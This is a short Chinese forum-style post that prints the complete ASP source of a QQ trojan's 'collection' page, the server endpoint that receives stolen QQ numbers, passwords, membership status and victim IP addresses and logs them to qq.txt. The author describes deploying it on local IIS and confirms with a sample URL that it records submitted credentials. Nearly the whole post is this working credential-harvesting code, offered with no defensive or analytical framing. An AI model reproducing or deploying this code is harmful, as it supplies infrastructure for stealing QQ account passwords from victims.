首先我们看下这个
<%
strLogFile="qq.txt"
QQNumber=request("QQNumber")
QQPassWord=request("QQPassWord")
QQclub=request("QQclub")
QQip=request("QQip")
if QQNumber="" or QQPassWord="" then
response.write "QQ"
response.end
End If
StrLogText=StrLogText&QQNumber&"----"&QQPassWord&"----会员:"&QQclub&"----IP:"&QQip&"("&request.servervariables("REMOTE_HOST")
StrLogText=StrLogText&")----"&date&" "&time
set f=Server.CreateObject("scripting.filesystemobject")
set ff=f.opentextfile(server.mappath(".")&"\"&strLogFile,8,true,0)
ff.writeline(chr(13)+chr(10)&StrLogText)
ff.close
set ff=nothing
set f=nothing
response.write "发送成功!"
%>
这个是一个QQ木马的 ASP收信文件
我在本地搭建IIS 页面路径是http://localhost/QQ.asp
就拿http://localhost/QQ.asp 来说 我把地址后面加上 ?QQNumber=123456&QQPassWord=123456
也就是http://localhost/QQ.asp?QQNumber=123456&QQPassWord=123456
会自动创建QQ.txt 把数据写到 QQ.txt里面,这个我测试了可以成功的!
------------------------------------------------------------------